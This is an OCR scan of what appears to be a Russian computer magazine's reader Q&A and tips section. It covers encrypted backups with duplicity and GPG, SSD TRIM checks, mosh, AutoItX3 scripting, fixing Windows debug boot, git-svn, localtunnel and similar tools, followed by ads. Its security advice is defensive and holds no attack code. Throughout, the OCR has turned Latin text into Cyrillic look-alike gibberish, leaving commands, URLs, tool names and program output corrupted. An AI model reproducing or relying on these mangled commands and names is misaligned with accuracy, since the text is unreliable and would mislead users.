(Би.у/СЗРш\о) — политику безопасности, 
позволяющую ограничить выполнение сто- 
ронних скриптов. При правильной настройке 
шансы на проведение Х$$-атаки стремятся 
к нулю. 

. Используй МАЕ например, Моа$еситу. 


Результат анализа 
надежности 5$ серви- 
сом отО@нца![у5 


восопиеплаироле БУТ Сеаркии нет: РБозвЕ РУЗсСаь даль 3 него ВОИНЫ Сие. 


Тру вагуат оао 54 гла Иоаце: Ре ВЕАВТ вас, Сего сарае 12 В, 


И а ь 


БЕЗОПАСНЫЕ БЭКАПЫ С БОРИСТУ В 0$ ХИ НМИХ 


Необходимость в регулярных бэкапах 
очевидна и не вызывает сомнений. 
Очень удобно хранить резервные копии 
в облачных хранилищах. Конечно, учи- 
тывая недавнюю историю, связанную 

с М№ЗА, ты можешь не доверять им важ- 
ную информацию, но с утилитой аирИсНу 
ты будешь абсолютно спокоен за свои 
бэкапы. Почему? Потому, что перед за- 
грузкой на сервер она шифрует данные, 
используя СпиРС, а кроме того, это 
опенсорсный проект, и, соответственно, 
ты можешь проверить исходный код на 
наличие бэкдоров. 


Устанавливаем утилиту 

Для ОЗ Х утилита доступна через 
Нотебгем! и МасРоп$. Если МасРо[5$ 
установлен, то установка аирйсКу сводится к вы- 
полнению в терминале команды 


$ зиао роге 1п5%а11 аир11с1у 


Для Убити — устанавливаем через ар1-дет. Если 
будем бэкапить в Соод!е Опуе, то нужно также 
установить адаа-руПоп-сйегт. Для этого скачай 


последние исходники (БИ.1у/СБаа-Я\м/п), раз- 
архивируй и выполни 


$ ./зежир.ру 1п$а11 


Создаем ключ 

ОирйсКу использует СпуР@ для шиф- 

рования. Соответственно, для того, 
чтобы начинать бэкапить, нужно сначала создать 
СпиРО-ключ: 


$ ерё --веп-Кеу 


На всякий случай ключ нужно экспортировать: 


$ ерё --ехрогЕ-зесге*-Кеу -а > туКеу.Кеу 


и сохранить его в надежном месте. Парольную 
фразу надо запомнить, иначе можешь потерять 
свои бэкапы. 


РАО 
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. Предоставь пользователям двух/мультифак- 
торную аутентификацию. 

. Подумай, нет ли уязвимостей в механизме ау- 
тентификации. Особое внимание удели функ- 
циям напоминания пароля (БИ.1у/огаРа$$1 р!) 


И «Запомнить меня» (Б®у/гетМе!тр|). 


Как скачать файл из интернета сразу 

в облако, не сохраняя сначала на ком- 
пьютер? 

Недавно я наткнулся на простейшее он- 

лайн-приложение (с1а.ога/заме), которое 
позволяет легко сохранять файлы напрямую в об- 
лачные хранилища. Примечательно, что не требу- 
ется устанавливать никаких расширений или ре- 
гистрироваться, надо просто указать УНЕЁ нужного 
файла и выбрать облако, то есть его можно легко 
использовать с телефона или планшета. В каче- 
стве доверенного «посредника», который соб- 
ственно и работает с твоими облаками, использу- 


ется АР! Шерскег.о (мимим. пк ерискег.сот). 


У меня М№ехи$ 7 ЗС. С него можно от- 

правлять $М$, но для этого я должен ис- 
пользовать разные сторонние приложения, 
которые либо слишком наворочены, либо не- 
юзабельны. Хочу стандартное $5М$-приложе- 
ние. Как установить? 

Для этого нужно взять (например, скачать 

с ХОА: БИ [у/М7ЗСпаНуе М5) «выдернутое» 
из любого аппарата приложение тт$.арк и по- 
местить его в /зуфет/арр любым доступным 
способом (нужен гоо{?), выставив при этом права 
гм/-г--г--. Воот Вгомзег (Би.1у/Вос{Вго\мизег) — не- 
плохой вариант, так как задаст нужные права ав- 
томатом. После перезагрузки устройства натив- 
ное 5М$-приложение будет установлено. 


На протяжении всего дня мне требуется 

$$Н-доступ к серверу. Я работаю с но- 
утбука, часто отправляю его в сон, чтобы эко- 
номить батарею. Так вот, после выхода из сна 
сессия разрывается, и это раздражает. 
Что порекомендуешь? 

Действительно, жизнь ЗЗН-сессии обо- 

рвать очень легко, особенно это касается 
работы с ноутбука: уход в сон, плохое подключе- 
ние или смена \М/!-Р!-сети — все это убьет соеди- 
нение. За исправление недостатков ЭЗН взялись 
профессора из Массачусетского технологиче- 
ского института. Результатом их работы стало 
приложение под названием Моэй (тозп.ти.едц). 
Принцип работы Мо$Пй существенно отличается 
отэЗН и Тете. Создатели разработали свой про- 
токол ЭЗР (Зе Фупсйгопхайоп Рготосо!), суть 


Собственно бэкапим 

№ Бэкапить мы будем в бооде Опуе. 
Конечно же, двухфакторная аутенти- 
фикация у нас включена, поэтому прежде всего 
нужно создать «пароль приложения». После того 
как пароль создан, для бэкапов нужно выполнить: 


$ ехрогЕ РАЗЗРНКА$Е="разрНгазейеге" 

$ аир11с1%у /поте/изег/ "в4осз: / / == 
изегпате:хххх хххх хххх «= 
хххх@5та11 .сот/Баскир" 


где вместо раззрпгазепеге подставь парольную 
фразу СпиРС@-ключа, а вместо иксов — пароль 
приложения Соо4е. Васкир — папка СОп\уе. 


(используется Погзупс). Но иногда нужно делать 
полные бэкапы (--Ри|-И-оаег-Шап), а старые дан- 
ные удалять (--гето\уе-оег-{Пап). Учитывая это, 
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Полезный хинт 


РАБОТАЕТ ЛИ ТЕМ НА 
МОЕМ 550 В МИМООМ? 


Для проверки можешь воспользоваться утилитой {5ий: 


+5и{11 Бейпау1ог ачегу 015аб1ебе1ефемоЕ1Ру 


Если результатом выполнения команды будет 0, значит, ТЕМ включен. Но эта команда лишь 
показывает, работает ли ТНМ на уровне софта, то есть посылает ли ОС специальные ТАМ- 
команды контроллеру $$0. Это, конечно, хорошо, но если ты хочешь на 100% убедиться, что 
ТАМ работает (исключить дефект прошивки контроллера, косяки драйвера и так далее), то для 
этого воспользуйся утилитой ТЕМСвВеск (БИ.1у/ТитСпвеск). Утилита работает по очень просто- 
му принципу: при первом запуске на диск записывается порция данных, при этом сохраняются 
адреса, в которые эти данные были записаны. После небольшой паузы нужно запустить утилиту 
еще раз. В этот раз она проверяет, лежат ли по сохраненным ранее адресам эти данные (чтобы 
начать проверку, сначала удали /$ОМ-файл из папки с утилитой). Если данных нет, значит, кон- 
троллер получил и корректно обработал команды ТАМ. Если данные еще лежат, это не всегда 
говорит о том, что у тебя проблемы с ТАМ: контроллер $$0 не обязан сразу же обрабатывать 
команду. Попробуй перезагрузить компьютер; если не поможет, то попробуй просто подождать. 
Но все же если данные лежат нетронутыми более суток, то, скорее всего, ТНМ на твоем $$0 
работает некорректно. Возможно, что-то с драйверами или спрошивкой 550. Для начала попро- 
буй обновить драйвер ЗАТА или же переключиться на стандартный драйвер от М$. Если же это не 
помогает, пробуй обновить прошивку $50. 


ТА1М снесКк ч0.4 - ИЧклссеп Бу У1адлаак Рапсе1ееч 
ЙЕСр$ = ИатеНниь .сом/Суеи$ Пайон/ с клтсИеск 


Коа41лпч сопслпиаслоп Даса Ркгом В:\ЕкатсНнескК-сопф . д5оп. . - 
Вкзое рабИи : 5.0: 
ОЁЕР5ее 46508825226 


Вап4ом Даса : СС 86 08 ЕЯ 13 98 ГЕ ВЯ 9? 0 21 13 В) 86 ВЕ 2С... 


Веа41тпч кам чо]щте Даба... 

Ореплпч \\.-\0:... 

ЗееКкК1пау $0 роз161оп 4650882526... 

Веа41пу 16384 русез ... 

Р1к5$ 16 Ъубсез: СС 86 08 ЕЯ 13 98 ГЕ ВЯ 9? 7021 13 В) 86 ВЕ 2С... 
Раса ипсрнапчей. 


СОНСЦ$ТОН: ТВ!1М арреак$ Фо Ъе МОТ ЧОВКИМС Сок ПВаз по КаскКей ат чуеб>. 


ШУ оц сап ке-кип &115 ркодгат $0 $е5& адалт или Сие зате Часа Ъ1осКкК, 
ог де]1ефе &клтсНнесК-соп®.]50п $0 скеафе а пем ее #11е. 


Епсек со ехле... 


Результат работы утилиты ТАИМСвеск 


Восстанавливаем данные 

Невозможно восстановить файл, если 

такой уже существует, поэтому обычно 
файлы восстанавливают с другим именем или в 
другую директорию. Для восстановления папки 
нужно выполнить 


Автоматизируем 
ОирйсКу отличается еще и тем, что 
применяет инкрементальные бэкапы 


в сгоп добавляем примерно такой Баз$П-скрипт: 


ир11с1%у "в4осз: / /чзегпамте:хххх хххх «= 


$ ехрогЕ РАЗЗРНКА$Е="разрпгазейеге" 

$ аир11с1у --Ри11-1+-о1аег-ЕВап_1М += 
/поте/чзег/ "540с$5:..." 

$ аир11с1Еу гетоуе-о1дег-+Пап 6М += 
--Когсе /поте/изег/ "..." 

ип5ефт РАЗЪРНКАФЕ 

ех1е @ 


хххх хххх@рта11.сот/Баскир" /Поте/изег 


Кроме Сооде Оиуе, аирИсКу поддерживает 
много других удаленных файловых серверов и 
множество интересных опций. Для более под- 
робной информации читай тап’ы или же посети 


страницу проекта (аирИсКу.попапи.огоа). 
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ЕЧТЕ ВООЕ Оре1оп5 
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Удаление ключа 
/ОЕВОС при загрузке 
МЛпао\м/$ 


работы которого заключается в синхронизации 
«состояний» терминалов клиента и сервера. Еще 
одна особенность Моэзп в том, что в качестве 
транспортного протокола используется ЦОР Бла- 
годаря этому Моз$Н позволяет работать в услови- 
ях очень плохого соединения, а также менять \М\- 
Е точку доступа на ходу или даже переключаться 
на ЗС-соединение, уходить в сон, при этом 
не разрывая сессии. Доступен под Шпих, ОЗ Х, 
Апагоа. Рекомендую посмотреть видеопрезен- 
тацию на странице проекта. 


[2] Можно ли из \УВ$ двигать мышью? Если 
да, то как? 
А Из чистого \В$ двигать мышью, конечно 
же, нельзя. Хотя можно воспользоваться 
сторонними средствами. Например, можно заю- 
зать АЩОМХЗ — «библиотечную» версию Ащон, 
предоставляющую функционал последнего че- 
рез АсНуех/СОМ-интерфейс. Подробное описа- 
ние библиотеки можно посмотреть на страничке 
$сир{-соата.сот/АитШХ. 111, а скачать Оку 
весом всего лишь 300 Кб — здесь: ои.1у/АитоихЗ. 
Чтобы использовать библиотеку, сначала нужно 
зарегистрировать ее в системе. Для этого скопи- 
руй ОЧ-файл в узЗЧет32 и выполни 


ге25\г32 АцфотехЗ. а11 


Если библиотека была успешно зарегистри- 
рована, можешь воспользоваться ею для пере- 
мещения мышки, например так: 


5еЕ оАифоте = Изсит ре . + 
Сгеае0ОБ3ес* ( "АифотеХЗ . Сопго1") 
‘перемещать медленно 


оАцфотТте.МоизеМоуе 9,0 ‘мгновенно 


ОАифотТт .МоизеМоуе 150, 1560, 09 


Экспериментировал с различными 

0О№5-серверами. Скорость ответов 
от ОМ№$-сервера, предоставляемого провай- 
дером, оказалась наивысшей, но я заметил, 
что все-таки с публичным ОМ№$ от бооде не- 
которые страницы загружаются быстрее. По- 
чему так происходит? 

ОМ№$-серверы от Сооде (а еще 

и ОрепОмМ$) участвуют в программе Тпе 
Сора| меге Зреедир (аТаз1егитегпе!т. сот). 
Многие зонные данные продублированы на сер- 
верах в разных регионах мира для ускорения до- 
ступа к ним. Суть программы как раз и заключа- 
ется в том, чтобы на основе физического 
местоположения пользователя, инициировав- 
шего запрос, определять сервер, который нахо- 
дится ближе всего к юзверю и который можно 
использовать для получения необходимых дан- 
ных. Зачастую провайдеры не так быстро вне- 
дряют подобные технологии, за счет чего ты мо- 
жешь наблюдать некоторое ускорение работы, 
используя сторонний сервер. Кстати, возможно, 
тебе будет интересна утилита Матебепсй (до- 
ступна для \МИпаом/5, Ипихи ОЗХ). Это своего рода 
бенчмарк ОМ$, который сравнит скорость твоего 
текущего ОМ$-сервера с большим количеством 
публичных и выдаст тебе подробный отчет и реко- 
мендации. 


64-разрядная \\Мп4о\м$ 7 отказывается 
грузить неподписанные драйверы, 
а подписывать каждый раз неудобно. Нагу- 
глил, что поможет включение режима отлад- 


ЭКРАННАЯ КЛАВИАТУРА у КЕЙЛОГГЕР? 


Если я буду вводить пароли через экранную клавиатуру, зна- 
чит ли это, что мои пароли не попадут в лапы кейлоггеров? 


С одной стороны, использование 
экранной клавиатуры действи- 
тельно оправданно. Большинство 
кейлоггеров не могут перехватить 
нажатия на виртуальной клавиату- 
ре, именно поэтому часто можно 
увидеть экранную клавиатуру для 
ввода, например, С\/\/С\УС?2-кода 
карты \за. 


Современные кейлоггеры давно 
научились обходить экранные 
клавиатуры. Например, они могут 
делать скриншоты по клику мышью. 
В этом плане использование 
экранной клавиатуры даже вредно, 
так как создает ложное чувство 
безопасности. 
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ки ядра. Так и сделал: Бс4ед1+ -4еБиё оп, за- 
тем перезагрузился. После этого винда 
не грузится даже в безопасном режиме. 
Как починить? 

Первое, что приходит в голову, — вос- 

пользоваться консолью восстановления. 
Но есть способ проще и намного быстрее. 
Во время загрузки винды нажимай <Е10> — 
это откроет меню настройки параметров загруз- 
ки \\Мтаом/5$. Все, что тебе теперь нужно сде- 
лать, — удалить ключ /ОЕВУС (смотри скриншот) 
и нажать <Ещег>. 

Действует это только для текущей загрузки, 
то есть следующая загрузка будет снова с вклю- 
ченным режимом отладки, если ты, конечно, 
не отключишь его: 


Бсаеа1е -аебив о++ 


На работе используется $\УМ-сервер. 

Как убедить начальство перейти 
на СК? Просто я уже привык к плюшкам этой 
системы. 

Возможно, переубеждать и не придется. 

Рекомендую попробовать в действии та- 
кую штуку, как 9й-$\п. Этот инструмент являет- 
ся двухсторонним мостом между СК и $\М. 
Ты можешь использовать локально СК и все его 
возможности, а потом сохранять результаты 
работы на 5\/М-сервере, не нарушая совмести- 
мости. Кстати, можно подсадить на дк-$\п и кол- 
лег, таким образом увеличивая шансы перехода 
твоей компании на СЁ. Подробнее о настройке 
инструмента читай здесь: БИ.1у/аИ-зуп-в\. Если 
ты работаешь под \М/паом5$, твой дй-$\уп является 
частью проекта тзу$Сй (тзузой.а(пиь.!ю). Кроме 
того, можно просто установить ац-$\п на Суд\мт. 


Можно ли добавить в сгоп задание, ко- 

торое запускало бы определенную про- 
грамму каждые 5 секунд? 

Средствами сгоп так сделать нельзя — ми- 

нимальный интервал времени, которым 
оперирует сгоп, составляет одну минуту. При не- 
обходимости можно запускать нужную задачу 
из эНпе|-скрипта, используя бесконечный цикл 
и <еер: 


мИ1]е гие 
о 


/поте/хаКер/турго5гат 
$1еер 5 
допе 


Чтобы выполнение продолжалось в фоновом 
режиме, даже после выхода пользователя из си- 
стемы, запускай скрипт через пойчр: 


$ повир_./емегу5есопа$.$И & 


[е] Нужна легковесная и быстрая БД. В ка- 
кую сторону смотреть? 
А Все зависит от конкретной задачи. Но мож- 
но посмотреть в сторону т-тетогу баз 
данных, то есть баз данных, работающих в опера- 
тивной памяти. Такие БД чаще всего легковесны, 
ведь они не нуждаются в реализации кеша, пол- 
ностью опираясь на кеш ОС. Среди такого рода 
БД хотелось бы выделить 1МОВ (зутаз.сот/ 
таб) и РазчОВ (дате .гиЛаза. 1). Для «пар- 
ных» данных стоит обратить внимание на Весд!$ 
(ге0!$.10) — высокопроизводительное распреде- 
ленное хранилище данных. Высокая скорость ра- 
боты Вед!$ и сохранность БД в случае аварийного 
сбоя достигаются за счет того, что данные хра- 
нятся в оперативке и сбрасываются на диск че- 
рез равные интервалы времени. = 
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Бесплатный сервис, 
позволяющий макси- 
мально быстро открыть 
внешний доступ кло- 
кальномувеб-серверу 


Тпзфа1]1 1оса!&иппе] ов119 АиБубетв. Свесх &Ве #011 ВЕАОМЕ 1 уоп 
боп'< вауе Бору ог Корубетв. 


$ видо де 1п8%а11 1оса1&иппе1 


Вип усчЕ 10са1 меб вегуес оп апу роге! Геб'о вау уоц'ге гоппап9 
Арасве оп роге 8080. 


Ном гоп 1оса1\аппе] разз!п 1& ©пе роге со впаге. Тье {1еве еше 
уси гип 1оса\&иппе] уой Вауе $©о ро1пе &о а раБ11с В5Н Кеу. Сеск 
+Не АБАОМЕ 1Ё уси пеед ве1р. Неге'в ап ехатр1е: 


$ 1юса М лмппе1 -К -/.ввВ/19 гва.роб 8080 


ВЕСЕХ1О1 (гооех101.сот) 


—> Недех101 — удобная шпаргалка для работы с регу- 
лярными выражениями. Сервис может деконструировать 
чужие регэкспы и объяснять функцию каждого оператора. 
По замыслу создателей, ссылки на объяснения можно раз- 
мещать прямо в комментариях к коду для удобства работы 
в команде. Кроме того, прямо на сайте можно протестиро- 
вать свой код, получая при этом в реальном времени полное 
объяснение, как обрабатывается запрос. Наконец, на сайте 
есть справочная информация и раздел с тестовыми во- 
просами для тех, кто учится пользоваться регулярными 
выражениями. 


744 


ГОСАЕТОММЕЕ (огодпит.сотЛосайиппе!) 


—> [осаНиппе!| — это простенький дет на ВиБу, позволяющий 
быстро открыть внешний доступ к локальному веб-серверу 

с помощью одноименного бесплатного сервиса. Для уста- 
новки достаточно набрать зи4о дет та! осаНиппе!, вОЗХ 
потребуются Соп5ое Тоо|$ из состава Хсоае. После установ- 
ки тулза сможет открыть любой указанный порт по адресу 
вида ПЁр://ххх.!1осаКиппе!.сот, так что это даже проще, 

чем Вуп0М$ со товарищи. Опять-таки в связке с рУПоп -т 
эипр!ентТР5$егуег это очень быстрый способ предоставить 
прямой доступ к любой папке на диске. 
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Фотохостингдля люби- нм 
телей мультикоптеров 


ОВИМВОХ (Оопоох.соп) 


—> ОВшБох — это удобный аддон для Огоррох. После ре- 
гистрации в учетке пользователя появляется специальная 
папка. Файлы в нее может загрузить любой желающий, вос- 
пользовавшись специальной веб-формой. Для защиты можно 
установить пароль на страницу. Так удобно работать с теми, 
у кого нет учетки в Огорбох, а также самому загружать файлы 
с чужих устройств. Тем более если ты пользуешься двухфак- 
торной авторизацией, то каждый раз проходить авторизацию 
тебе наверняка лениво. Помимо файлов, через веб-морду 
можно загружать текстовые файлы-заметки с пояснениями 

и комментариями. Увы, заметки никак нельзя связать с фай- 
лами (например, положить одной папкой) или даже назвать 
таким же именем (в начале заметки будет таймстемп). 


6-„- Е 
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ОВОМЕЗТАСВАМ (ул. огопез{аог.ат) 


—> Как можно догадаться из названия, Огопез{адгат — это 
аналог пЗадгат для владельцев мультикоптеров. Нет, здесь 
нельзя накладывать винтажные эффекты и кадрировать 
фотки, но можно обмениваться кадрами местности с такими 
же фанатами АН.Огопе и других пилотируемых аппаратов. 
Каждая картинка привязывается к конкретной точке на карте, 
опционально в описании может указываться использованное 
при съемке оборудование. Функционал довольно базовый, 

и фотографий пока лишь несколько десятков, но сама по себе 
идея хороша. Хотелось бы, чтобы создатели реализовали 
поиск по камере, тогда можно было бы оценить возможности 
популярных моделей. 
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3 сертификата 
на стильные мужские ботинки из замши 
на облегченной контрастной подошве* 


* подробности на сайте м/мим/.лапсага.ги 


Оформить дебетовую или кредитную «Мужскую карту» 
можно на сайте млм. а№аБапК.ги или позвонив 

по телефонам: 

8 (495) 788-88-78 в Москве 

8-800-2000-000 в регионах России (звонок бесплатный) 


СКОЙ ЖУРНАЛ С ИМЕНЕМ 


МАХ М А Альфа-Банк (дате)Гапа 


ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326 
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* Дата окончания предоставления промокода для изучения онлайн курса - 31 марта 2014 года. 
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